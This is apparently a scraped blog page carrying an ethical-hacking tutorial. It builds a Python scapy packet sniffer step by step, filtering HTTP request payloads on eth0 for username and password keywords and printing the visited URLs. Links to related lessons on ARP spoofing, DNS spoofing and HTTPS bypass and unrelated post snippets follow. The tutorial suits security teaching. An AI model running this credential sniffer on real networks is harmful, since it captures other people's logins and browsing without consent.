PACKET_SNIFFER

  • Capture data flowing through an interface.
  • Filter this data.
  • Display Interesting information such as:
    • Login info(username&password).
    • Visited websites.
    • Images.
    • ...etc

PACKET_SNIFFER

CAPTURE & FILTER DATA

  • scapy has a sniffer function.
  • Can capture data sent to/from iface.
  • Can call a function specified in prn on each packet.

Install the third party package.

pip install scapy_http

1. Write the Python to sniff all the Raw packets.

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        if packet.haslayer(scapy.all.Raw):

            print(packet.show())

sniff("eth0")

Execute the script and sniff the packets on eth0.

2. Filter the useful packets

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        if packet.haslayer(scapy.all.Raw):

            print(packet[scapy.all.Raw].load)

sniff("eth0")

Execute the script and sniff the packets on eth0.

Rewrite the Python Script to filter the keywords.

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        if packet.haslayer(scapy.all.Raw):

            load = packet[scapy.all.Raw].load.decode(errors='ignore')

            keywords = ["username", "user", "login", "password", "pass"]

            for keyword in keywords:

                if keyword in load:

                    print(load)

                    break

sniff("eth0")

Add the feature - Extracting URL

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        url = packet[HTTPRequest].Host + packet[HTTPRequest].Path

        print(url)

        if packet.haslayer(scapy.all.Raw):

            load = packet[scapy.all.Raw].load.decode(errors='ignore')

            keywords = ["username", "user", "login", "password", "pass"]

            for keyword in keywords:

                if keyword in load:

                    print(load)

                    break

sniff("eth0")

Python Ethical Hacking - Packet Sniffer(1)的更多相关文章

  1. Python Ethical Hacking - Packet Sniffer(2)

     Capturing passwords from any computer connected to the same network.  ARP_SPOOF + PACKET_SNIFFER Ta ...

  2. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  3. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  4. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  5. Python Ethical Hacking - BeEF Framework(1)

    Browser Exploitation Framework. Allows us to launch a number of attacks on a hooked target. Targets ...

  6. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)

    Recalculating Content-Length: #!/usr/bin/env python import re from netfilterqueue import NetfilterQu ...

  7. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  8. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  9. Python Ethical Hacking - DNS Spoofing

    What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...

随机推荐

  1. UltraEdit常用技巧

    Tip 1: Alt+C 列模式可以说最初选择使用这个文本编辑软件,原因很简单,就是因为“她”具有列编辑模式.如果您还不知道什么是列编辑模式的话,我想您应该好好研究一下啦.这是一个超级“赞”的功能.在 ...

  2. 分享2个近期遇到的MySQL数据库的BUG案例

    近一个月处理历史数据问题时,居然连续遇到了2个MySQL BUG,分享给大家一下,也欢迎指正是否有问题. BUG1: 数据库版本:  MySQL5.7.25 - 28 操作系统: Centos 7.7 ...

  3. 原来你是这样的BERT,i了i了! —— 超详细BERT介绍(一)BERT主模型的结构及其组件

    原来你是这样的BERT,i了i了! -- 超详细BERT介绍(一)BERT主模型的结构及其组件 BERT(Bidirectional Encoder Representations from Tran ...

  4. 手把手教你学Numpy,搞定数据处理——收官篇

    本文始发于个人公众号:TechFlow,原创不易,求个关注 今天是Numpy专题第6篇文章,我们一起来看看Numpy库当中剩余的部分. 数组的持久化 在我们做机器学习模型的研究或者是学习的时候,在完成 ...

  5. windows下 react-native环境搭建

    跟着慕课网做案例,搭建rn环境遇到很大问题. 下面说一下: 首先看一下文档:http://reactnative.cn/docs/0.44/getting-started.html#content 注 ...

  6. nginx 代理post请求做负载均衡

    项目中遇到nginx代理post请求nodejs服务.但是一直404.发现好像是nginx重定向的时候将post请求变成了get请求.上配置: # 负载均衡服务器配置 upstream pdf_ups ...

  7. C# 从1到Core--委托与事件

    委托与事件在C#1.0的时候就有了,随着C#版本的不断更新,有些写法和功能也在不断改变.本文温故一下这些改变,以及在NET Core中关于事件的一点改变. 一.C#1.0 从委托开始 1. 基本方式 ...

  8. Java设计模式三

    建造者模式 当我们思考通过复杂的零件来生成一个完整的产品时,就用到了今天要说的主题-建造者模式,下面我们实际的代码来分析建造者模式的设计 假设飞机起飞需要有多个步骤,但是每种型号的飞机起飞的步骤又不相 ...

  9. 【Oracle】rman中SBT_TYPE类型的备份如何删除

    技阳的rman数据库出现删除rman备份失败,原因是出现SBT_TYPE的磁带备份. [BEGIN] 2018/8/13 13:48:42 RMAN> list backup; List of ...

  10. 如何使用JS操纵伪元素

    css引入伪类和伪元素概念是为了格式化文档树以外的信息.也就是说,伪类和伪元素是用来修饰不在文档树中的部分,比如,一句话中的第一个字母,或者是列表中的第一个元素. 伪类 用于当已有元素处于的某个状态时 ...